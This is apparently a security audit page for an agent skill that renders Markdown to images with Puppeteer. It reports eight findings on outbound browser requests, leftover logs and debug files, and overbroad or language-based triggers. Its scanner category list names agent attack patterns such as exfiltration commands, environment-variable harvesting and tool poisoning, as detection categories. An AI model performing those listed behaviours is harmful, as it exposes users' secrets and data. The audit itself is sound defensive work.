Security audit

auto-md2img

Security checks across malware telemetry and agentic risk

Overview

This is a real Markdown-to-image converter, but it needs review because it can render untrusted Markdown in a browser, make outbound requests, and leave user content on disk more broadly than its privacy claims suggest.

Install only if you are comfortable with a local Node/Puppeteer tool processing your Markdown. Avoid using it on secrets, private documents, or attacker-supplied Markdown unless network access is sandboxed or blocked. Avoid debug mode for sensitive content, choose a controlled output directory, and clean generated images, logs, and page files after use.

SkillSpector

By NVIDIA

Vulnerability Patterns

Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection

Findings (8)

Description-Behavior Mismatch

Low

Confidence: 95% confidence
Finding: The script writes extra artifacts beyond the requested image output: a .log file is always created, and in debug mode it also writes paginated intermediate Markdown files. This can leak sensitive Markdown content, file paths, stack traces, or metadata to disk unexpectedly, which is a security issue when the input may contain secrets or when output directories are shared.

Context-Inappropriate Capability

Medium

Confidence: 98% confidence
Finding: Rendering untrusted Markdown through Puppeteer with page.setContent(..., { waitUntil: 'networkidle0' }) allows the browser to fetch remote resources referenced by the generated HTML, such as images or other embedded content. This can cause SSRF-style requests, internal network probing, external data exfiltration via request side effects, and privacy leaks about the host environment processing the Markdown.

Context-Inappropriate Capability

Medium

Confidence: 98% confidence
Finding: The final screenshot generation path also loads rendered Markdown into Puppeteer and waits for network idle, so any remote references in Markdown/HTML can trigger browser-initiated requests during image creation. In an automation or agent environment, this expands the attack surface from simple file conversion to outbound request capability against attacker-controlled or internal endpoints.

Vague Triggers

Medium

Confidence: 90% confidence
Finding: The trigger scope is described so broadly that the skill may activate for many ordinary Markdown-like replies rather than only when image rendering is necessary. In an agent setting, overbroad triggering can cause unintended file creation, browser execution, and content transformation, increasing attack surface and creating opportunities for misuse or denial-of-service through unnecessary conversions.

Natural-Language Policy Violations

Medium

Confidence: 87% confidence
Finding: The instruction to use the skill whenever the user inputs Chinese creates a locale-based auto-trigger without any user-choice or policy constraint. That can cause unnecessary rendering of user content into images solely based on language, which is risky in multi-lingual environments and may bypass expected text handling, transparency, or accessibility behaviors.

Vague Triggers

Medium

Confidence: 90% confidence
Finding: The trigger scenarios are defined so broadly that the skill may activate for nearly any response involving formatted or long text, even when image conversion is unnecessary. Overly broad activation can cause unintended processing of user content, unnecessary file creation, and accidental exposure of sensitive markdown through image generation or debug artifacts.

Missing User Warnings

Medium

Confidence: 95% confidence
Finding: The skill documents a debug mode that saves intermediate HTML and raw pagination content to disk, but it does not prominently warn that this may persist sensitive user content outside the normal response flow. In systems handling private chats, credentials, or internal documents, this creates a confidentiality risk through residual files and logs.

Natural-Language Policy Violations

Medium

Confidence: 87% confidence
Finding: The instruction to use a Chinese-specific skill whenever the user inputs Chinese imposes routing behavior without user consent or clear necessity. This can cause inappropriate handling, unexpected data flow to another skill, and reduced transparency about how user content is processed.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal